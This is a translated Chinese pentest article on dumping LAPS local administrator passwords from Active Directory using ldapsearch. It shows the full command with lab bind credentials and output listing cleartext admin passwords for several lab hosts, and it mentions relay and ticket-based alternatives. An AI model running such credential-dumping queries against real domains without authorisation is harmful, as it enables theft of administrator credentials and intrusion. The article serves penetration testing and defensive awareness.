ldapsearch

ldapsearch
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【技术分享】如何使用ldapsearch来dump域中的LAPS密码
阅读量 48837 | 稿费 50

分享到： QQ空间 新浪微博 微信 QQ facebook twitter
发布时间：2017-07-27 15:33:54
译文声明
本文是翻译文章，文章原作者，文章来源：room362.com
原文地址：https://room362.com/post/2017/dump-laps-passwords-with-ldapsearch/

译文仅供参考，具体内容表达以及含义原文为准

×

http://p1.qhimg.com/t01a2c2e586a5c99838.jpg

译者：for_while

预估稿费：50 RMB

投稿方式：发送邮件至linwei#360.cn，或登陆网页版在线投稿

前言

如果你曾经对使用LAPS的组织做过渗透测试，你应该知道在安全方面使用随机本地管理员密码（LAPS）是最佳的解决方案。

使用ldapsearch来dump域中的LAPS密码

LAPS将其信息存储在Active Directory中：

到期时间： ms-Mcs-AdmPwdExpirationTime: 131461867015760024

明文存储的密码： ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(

在LAPS首次出现时，Active Directory中的任何用户都可以读取它。不过Microsoft现在已经修复了这个漏洞，您现在必须拥有All extended rights对象的权限或Active Directory的完全控制权，才能执行此操作。

感谢Meatballs，提供了一个Metasploit模块：enum_laps.rb。但是，不幸的是，在渗透测试的过程中我们并不总能使用 Meterpreter 会话来运行该模块。不过使用ldapsearch（包含在ldapscripts Debian/Ubuntu 中的软件包中）也能实现和上述模块相同的查询。一下为一个运行示例：

ldapsearch -x -h 192.168.80.10 -D
"helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info"
"(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
下面解释下这条命令

让我们打破这个：

-x – 使用基本身份验证

-h 192.168.80.10 – 连接到ldap的域控制器

-D "helpdesk" -w ASDqwe123- 以helpdesk（用户名），ASDqwe123（密码）登录

-b "dc=sittingduck,dc=info" – 这将加载整个域的基本LDAP对象。

"(ms-MCS-AdmPwd=*)"- 过滤掉我不能查看ms-MCS-AdmPwd的值的对象。（如果你拥有查看该管理员密码的用户权限，则会显示该密码。）

ms-MCS-AdmPwd- 只显示ms-MCS-AdmPwd对象（默认情况下包含对象名称和DN，以便您知道它所属的主机）

命令执行示例：

$ ldapsearch -x -h 192.168.80.10 -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd
#
# DC1, Domain Controllers, sittingduck.info
dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F
# SDCLIENT_DAWIN7, LabComputers, Lab, sittingduck.info
dn: CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR
# SD_WSUS_2012, LabComputers, Lab, sittingduck.info
dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T
# WIN-PM0ID6F0AHN, LabComputers, Lab, sittingduck.info
dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(
# search reference
ref: ldap://research.sittingduck.info/DC=research,DC=sittingduck,DC=info
# search reference
ref: ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,D
C=info
# search reference
ref: ldap://DomainDnsZones.sittingduck.info/DC=DomainDnsZones,DC=sittingduck,D
C=info
# search reference
ref: ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info
# search result
search: 2
result: 0 Success
现在，仅仅只有本地admin密码并不能确定LDPS就开启了，然而你还是可以执行一些后续的操作。

后记

你可以使用Kerberos进行身份验证（即： Golden/Silver 票据）

因为Windows没有（据我所知）限制只能在域控上登录LDAP连接（可能在未来推出），使用一点编码技术可以让ntlmrelayx dump LAPS密码。

本文翻译自 room362.com， 原文链接 。如若转载请注明出处。
安全知识

for_while 分享到： QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

2018安恒杯11月赛-Web&Crypto题解
2018-11-26 10:02:02

U2F安全协议分析
2018-11-24 10:00:48

二十年重回首——CIH病毒源码分析
2018-11-23 15:20:19

Cookie Maker：隐藏在Google Docs中的恶意网络
2018-11-23 14:30:40
|发表评论

发表你的评论吧
昵称
我不是黑客
换一个
|评论列表
还没有评论呢，快去抢个沙发吧~
for_while
这个人太懒了，签名都懒得写一个
文章
20
粉丝
4
TA的文章
【技术分享】走到哪黑到哪——Android渗透测试三板斧
2017-08-18 11:54:22
【技术分享】Android内核漏洞利用技术实战：环境搭建&栈溢出实战
2017-08-14 16:22:02
【技术分享】Burp Suite扩展之Java-Deserialization-Scanner
2017-08-10 10:53:11
【技术分享】联合Frida和BurpSuite的强大扩展--Brida
2017-08-07 10:23:56
【技术分享】使用Frida绕过Android SSL Re-Pinning
2017-07-28 11:27:11

输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下（下）
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵：深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading...0daybank